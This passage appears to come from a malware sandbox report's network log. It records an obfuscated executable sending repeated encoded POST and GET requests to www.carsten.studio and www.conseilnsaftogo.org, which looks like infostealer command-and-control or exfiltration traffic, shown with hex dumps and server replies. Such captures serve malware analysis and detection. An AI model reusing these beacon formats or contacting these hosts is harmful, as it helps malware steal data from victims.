                                                                                Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
                                                                                Dec 3, 2024 14:16:49.806374073 CET899INData Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5
                                                                                Data Ascii: H|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+EI?2.


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                42192.168.2.550023217.160.0.200803680C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:16:51.149569035 CET801OUTPOST /fqxx/ HTTP/1.1
                                                                                Host: www.carsten.studio
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.carsten.studio
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.carsten.studio/fqxx/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Raw: 50 4c 70 44 3d 4a 53 73 61 38 70 46 36 31 37 4e 49 2b 66 54 49 31 69 6b 75 6e 64 30 4b 78 6d 6f 47 52 4e 33 59 76 67 55 4f 71 55 4d 6c 49 65 62 6b 7a 52 6a 67 45 66 7a 58 52 32 39 73 55 59 45 6c 76 32 70 48 6c 6f 75 79 72 64 63 36 4a 7a 30 4d 63 36 68 51 68 51 44 6f 35 39 2b 2f 6f 2b 42 79 71 68 6b 41 57 39 6e 61 69 6a 63 72 74 75 6a 61 4f 70 35 41 71 68 4c 6f 70 74 34 56 65 39 4b 62 4d 73 54 51 58 7a 31 6f 54 78 66 53 35 6c 49 71 2f 76 70 32 34 6b 71 5a 6e 67 44 52 37 74 44 44 70 67 6a 2b 6c 48 6d 58 4c 4f 78 44 52 68 54 46 33 69 54 74 73 47 64 61 44 4a 6c 77 54 2f 4a 48 78 77 6f 65 61 67 32 53 31 43 35 77 72 51 31 39 34 30 6d 6e 44 52 6f 62 32 7a 4f 31 53 7a 35 49
                                                                                Data Ascii: PLpD=JSsa8pF617NI+fTI1ikund0KxmoGRN3YvgUOqUMlIebkzRjgEfzXR29sUYElv2pHlouyrdc6Jz0Mc6hQhQDo59+/o+ByqhkAW9naijcrtujaOp5AqhLopt4Ve9KbMsTQXz1oTxfS5lIq/vp24kqZngDR7tDDpgj+lHmXLOxDRhTF3iTtsGdaDJlwT/JHxwoeag2S1C5wrQ1940mnDRob2zO1Sz5I
                                                                                Dec 3, 2024 14:16:52.462349892 CET1236INHTTP/1.1 200 OK
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Date: Tue, 03 Dec 2024 13:16:52 GMT
                                                                                Server: Apache
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED]
                                                                                Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
                                                                                Dec 3, 2024 14:16:52.462418079 CET899INData Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5
                                                                                Data Ascii: H|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+EI?2.


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                43192.168.2.550024217.160.0.200803680C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:16:53.823158026 CET1818OUTPOST /fqxx/ HTTP/1.1
                                                                                Host: www.carsten.studio
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.carsten.studio
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.carsten.studio/fqxx/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Raw: 50 4c 70 44 3d 4a 53 73 61 38 70 46 36 31 37 4e 49 2b 66 54 49 31 69 6b 75 6e 64 30 4b 78 6d 6f 47 52 4e 33 59 76 67 55 4f 71 55 4d 6c 49 65 54 6b 7a 43 72 67 46 38 4c 58 51 32 39 73 64 34 45 67 76 32 70 61 6c 6f 32 32 72 64 42 48 4a 77 4d 4d 63 63 56 51 70 44 62 6f 32 39 2b 2f 33 75 42 2f 33 52 6b 5a 57 39 58 65 69 6a 4d 72 74 75 6a 61 4f 71 78 41 6f 30 33 6f 6d 4e 34 55 54 74 4b 2b 64 63 54 6f 58 7a 73 66 54 78 61 77 34 55 6f 71 38 4c 4e 32 2f 53 65 5a 68 77 44 54 2b 74 43 41 70 6e 71 6b 6c 48 37 6d 4c 4f 45 55 52 69 7a 46 30 6b 47 75 7a 6e 78 4d 56 6f 70 49 47 74 46 2f 6e 6d 34 67 53 7a 33 6c 38 67 31 31 75 77 6c 51 32 52 32 4c 48 31 6f 4c 6f 53 4b 36 61 6c 64 48 51 47 39 66 55 2f 51 74 37 6b 4e 41 35 70 35 73 35 48 77 56 72 70 77 39 78 50 43 41 4e 4f 54 67 7a 35 49 4f 2f 51 77 37 62 73 65 63 61 74 76 70 43 44 35 67 68 52 4d 4a 44 4b 58 6b 37 59 70 7a 32 48 63 67 6a 54 62 76 63 75 4b 47 4c 6b 71 34 34 70 76 6e 44 2f 52 6d 57 62 33 6a 51 30 2b 4c 4c 64 38 39 48 42 32 33 75 68 79 2b 61 56 4e 65 4f [TRUNCATED]
                                                                                Data Ascii: PLpD=JSsa8pF617NI+fTI1ikund0KxmoGRN3YvgUOqUMlIeTkzCrgF8LXQ29sd4Egv2palo22rdBHJwMMccVQpDbo29+/3uB/3RkZW9XeijMrtujaOqxAo03omN4UTtK+dcToXzsfTxaw4Uoq8LN2/SeZhwDT+tCApnqklH7mLOEURizF0kGuznxMVopIGtF/nm4gSz3l8g11uwlQ2R2LH1oLoSK6aldHQG9fU/Qt7kNA5p5s5HwVrpw9xPCANOTgz5IO/Qw7bsecatvpCD5ghRMJDKXk7Ypz2HcgjTbvcuKGLkq44pvnD/RmWb3jQ0+LLd89HB23uhy+aVNeOSsFuPmMuAnZN15moneWYT5fyXf8aVB6p1qIs5db6rzrRMCrzbRgjpdtNv/9FjdjkY2Ds3IhCnKduuMPFyKCyydgp2JdAd9RlN05Zq4fWRiZLJS+NDzEZwWgg90uzACpTpw5I2yHPWzWXGiiqYH6ywbk5IFEmL5uJdalLuR27hpEng1sNdnAJN/08JEj4G4Rl3ZgQ/pnSLNtrf6Sdzs7VGLSC1ftdjh5yp69IKjsvRb8FSFM0fVYtH+Q017N1D9kD/6SxRwiSNP/Fqsp4aUg5sRT5kVuAGzdNshbyk436BnFcKYqISbhPGuMlUuj1dvq/eOiEQ7VU97EjwiRfDXzjRmqV3OhkekRy16PtV62ElqqspMVLvSem5+3C4kjf6D4E3/TvSec/fu4fppRsx0h3ioMZxVr0L/WhtK0Yp+40/sp3uDqpOwUcZBJCphptf10CqiWwN1vObhkhAnvaDHWrfhdZcOYpIZLydjY6Ldx8IdxQ+DssGxgZuRd3x9Z/Lgpce8SGyLCPh2+OOor3rUWjT8MpjNz/z/J8xKR34dkNLi4CVxyLtvGOy0nQOOSQ+bCBlRuPf2CxzO2xV2mclF49MkpSiSAuJ+iPOVfLss6LyIvloA8Agj4Au3OmNg6lee59AkTY/Yd5x0KcmAVT/fsKjRB1ARBY6TQYlZ [TRUNCATED]
                                                                                Dec 3, 2024 14:16:55.182305098 CET1236INHTTP/1.1 200 OK
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Date: Tue, 03 Dec 2024 13:16:54 GMT
                                                                                Server: Apache
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED]
                                                                                Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
                                                                                Dec 3, 2024 14:16:55.182400942 CET899INData Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5
                                                                                Data Ascii: H|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+EI?2.


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                44192.168.2.550025217.160.0.200803680C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:16:56.528302908 CET522OUTGET /fqxx/?PLpD=EQE6/f8JwKBVpYrNkw4Fqaku42g/bdfb0nglp3s8GuOVuBTyHurIT2AdZcstinw02q63t984fSctf9ZXgFK3z9ursJZ5jisJa4HYxh49r+T+FoVNmB7Fsft7Yvb0T4abVw==&dfxXf=5pgPlrExEj HTTP/1.1
                                                                                Host: www.carsten.studio
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Dec 3, 2024 14:16:57.765364885 CET1236INHTTP/1.1 200 OK
                                                                                Content-Type: text/html
                                                                                Content-Length: 4545
                                                                                Connection: close
                                                                                Date: Tue, 03 Dec 2024 13:16:57 GMT
                                                                                Server: Apache
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 54 52 41 54 4f 20 2d 20 44 6f 6d 61 69 6e 20 72 65 73 65 72 76 65 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 4f 70 65 6e 20 53 61 6e 73 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 22 3e 0d 0a 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 33 66 33 66 33 3b 20 70 61 64 64 69 6e 67 3a 20 34 30 70 78 20 30 3b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 31 35 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html><html> <head> <title>STRATO - Domain reserved</title> </head> <body style="background-color: #fff; font-family: Open Sans, sans-serif; padding: 0; margin: 0;"> <div style="background-color: #f3f3f3; padding: 40px 0; width: 100%;"> <div style="width: 150px; margin-left: auto; margin-right: auto;"><a href="https://www.strato.de" rel="nofollow" style="border: 0;"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 157.4 33.7"><defs><style>.a{fill:#f80;}.b{fill:#f80;}</style></defs><title>STRATO</title><path class="a" d="M17.8,7a4.69,4.69,0,0,1-4.7-4.7H29.6A4.69,4.69,0,0,1,34.3,7V23.5a4.69,4.69,0,0,1-4.7-4.7V9.4A2.37,2.37,0,0,0,27.2,7Z" transform="translate(-1.3 -2.3)"/><path class="b" d="M57.7,32.9c-1.3,2.5-4.7,2.6-7.3,2.6-2.1,0-4-.1-5.2-.2-1.5-.1-1.8-.5-1.8-1.3V32.9c0-1.3.2-1.7,1.4-1.7,2.1,0,3.1.2,6.2.2,2.4,0,2.9-.2,2.9-2.3,0-2.4,0-2.5-1.3-3.1a42.2,42.2,0,0,0-4.5-1.8c-3.7-1.6-4.4-2.3-4.4-6.5,0-2.6.5-4.8,3.4-5.7a14,14,0,0,1,4.9-.6c1.6, [TRUNCATED]
                                                                                Dec 3, 2024 14:16:57.765403986 CET1236INData Raw: 33 2c 30 2c 31 2e 36 2c 31 2e 33 2c 32 2e 31 2e 39 2e 35 2c 32 2c 2e 38 2c 32 2e 39 2c 31 2e 33 2c 34 2e 39 2c 32 2e 31 2c 36 2c 32 2e 35 2c 36 2c 36 2e 37 61 31 30 2e 31 32 2c 31 30 2e 31 32 2c 30 2c 30 2c 31 2d 2e 36 2c 34 2e 38 4d 37 37 2e 31
                                                                                Data Ascii: 3,0,1.6,1.3,2.1.9.5,2,.8,2.9,1.3,4.9,2.1,6,2.5,6,6.7a10.12,10.12,0,0,1-.6,4.8M77.1,15.7c-2.1,0-3.7,0-5.2-.1v18a1.4,1.4,0,0,1-1.5,1.6H69c-1.1,0-1.7-.3-1.7-1.6V15.7c-1.5,0-3.2.1-5.3.1-1.5,0-1.5-.9-1.5-1.6v-.9A1.36,1.36,0,0,1,62,11.8H77.2c.8,0,1.
                                                                                Dec 3, 2024 14:16:57.765417099 CET1236INData Raw: 35 73 2d 2e 36 2c 37 2e 31 2d 32 2e 36 2c 39 2e 35 4d 31 35 33 2c 31 37 2e 34 63 2d 2e 38 2d 31 2e 36 2d 32 2e 34 2d 32 2e 33 2d 34 2e 34 2d 32 2e 33 73 2d 33 2e 36 2e 36 2d 34 2e 34 2c 32 2e 33 63 2d 2e 37 2c 31 2e 35 2d 2e 38 2c 34 2e 34 2d 2e
                                                                                Data Ascii: 5s-.6,7.1-2.6,9.5M153,17.4c-.8-1.6-2.4-2.3-4.4-2.3s-3.6.6-4.4,2.3c-.7,1.5-.8,4.4-.8,6.1s.1,4.6.8,6.1,2.4,2.3,4.4,2.3,3.6-.7,4.4-2.3.8-4.2.8-6.1-.1-4.6-.8-6.1" transform="translate(-1.3 -2.3)"/><path class="a" d="M24.9,14a2.26,2.26,0,0,0-2.3-2.
                                                                                Dec 3, 2024 14:16:57.765544891 CET975INData Raw: 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 22 20 6c 61 6e 67 3d 22 6e 6c 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 20 66 6f 6e 74 2d 77 65
                                                                                Data Ascii: padding-bottom: 30px" lang="nl"><span style="font-size: 14px; color: #777; font-weight: bold;">Nederlands</span><br>Deze website werd zojuist geregistreerd. Een webinhoud werd nog niet toegevoegd.</div> <div style="padding-bottom: 30px"


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                45192.168.2.550026154.70.82.246803680C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:17:05.028929949 CET796OUTPOST /lqxd/ HTTP/1.1
                                                                                Host: www.conseilnsaftogo.org
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.conseilnsaftogo.org
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.conseilnsaftogo.org/lqxd/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Raw: 50 4c 70 44 3d 39 61 59 4c 69 59 66 56 67 52 56 30 47 43 65 2f 4e 47 42 5a 7a 2f 4c 37 55 73 32 53 2f 30 6a 62 62 2b 31 42 69 34 79 61 35 6b 69 34 65 32 72 4c 39 6a 32 31 72 2f 6f 37 67 42 58 59 6f 76 6d 33 37 44 49 76 2b 6f 6f 37 71 53 6c 45 44 42 70 6c 54 52 37 2b 2f 6b 52 59 77 2f 38 6d 4d 63 49 77 66 78 6b 67 30 4a 67 45 5a 49 34 66 7a 6d 59 39 49 49 4b 57 46 41 68 48 6f 44 62 65 6c 76 50 6d 69 54 2f 5a 78 6c 2b 74 41 70 62 46 65 71 50 47 67 55 79 76 67 76 34 54 34 37 36 78 36 5a 45 74 67 50 2b 55 4b 6c 54 51 39 56 4c 75 56 6f 55 59 35 43 72 77 41 71 45 77 43 66 50 75 73 67 72 6e 30 52 6a 36 49 69 30 3d
                                                                                Data Ascii: PLpD=9aYLiYfVgRV0GCe/NGBZz/L7Us2S/0jbb+1Bi4ya5ki4e2rL9j21r/o7gBXYovm37DIv+oo7qSlEDBplTR7+/kRYw/8mMcIwfxkg0JgEZI4fzmY9IIKWFAhHoDbelvPmiT/Zxl+tApbFeqPGgUyvgv4T476x6ZEtgP+UKlTQ9VLuVoUY5CrwAqEwCfPusgrn0Rj6Ii0=


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                46192.168.2.550027154.70.82.246803680C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:17:07.700752974 CET816OUTPOST /lqxd/ HTTP/1.1
                                                                                Host: www.conseilnsaftogo.org
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.conseilnsaftogo.org
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.conseilnsaftogo.org/lqxd/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                Data Raw: 50 4c 70 44 3d 39 61 59 4c 69 59 66 56 67 52 56 30 48 6a 75 2f 4c 6c 70 5a 32 66 4c 34 61 4d 32 53 30 55 6a 66 62 2b 70 42 69 35 47 77 34 58 4b 34 64 58 62 4c 38 6e 69 31 73 2f 6f 37 76 52 57 51 6d 50 6d 2b 37 44 45 4e 2b 74 49 37 71 53 68 45 44 45 4e 6c 54 43 54 35 2f 30 52 47 75 66 38 6f 52 4d 49 77 66 78 6b 67 30 4a 64 76 5a 4c 49 66 7a 57 6f 39 49 74 32 56 4d 67 68 41 76 44 62 65 30 2f 50 71 69 54 2b 2b 78 6e 4b 48 41 71 7a 46 65 72 2f 47 75 68 53 6f 75 66 35 61 6c 4c 37 54 71 37 78 32 67 39 32 4c 4b 44 57 6e 68 7a 2f 4e 55 65 6c 79 6a 67 6a 59 54 4b 6f 49 53 4d 48 5a 39 51 4b 4f 75 79 7a 4b 57 31 68 57 30 67 2f 2b 44 6d 38 74 2b 46 32 43 45 72 51 2f 58 36 46 31
                                                                                Data Ascii: PLpD=9aYLiYfVgRV0Hju/LlpZ2fL4aM2S0Ujfb+pBi5Gw4XK4dXbL8ni1s/o7vRWQmPm+7DEN+tI7qShEDENlTCT5/0RGuf8oRMIwfxkg0JdvZLIfzWo9It2VMghAvDbe0/PqiT++xnKHAqzFer/GuhSouf5alL7Tq7x2g92LKDWnhz/NUelyjgjYTKoISMHZ9QKOuyzKW1hW0g/+Dm8t+F2CErQ/X6F1


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                47192.168.2.550028154.70.82.246803680C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:17:10.391562939 CET1833OUTPOST /lqxd/ HTTP/1.1
                                                                                Host: www.conseilnsaftogo.org
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Origin: http://www.conseilnsaftogo.org
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.conseilnsaftogo.org/lqxd/
                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
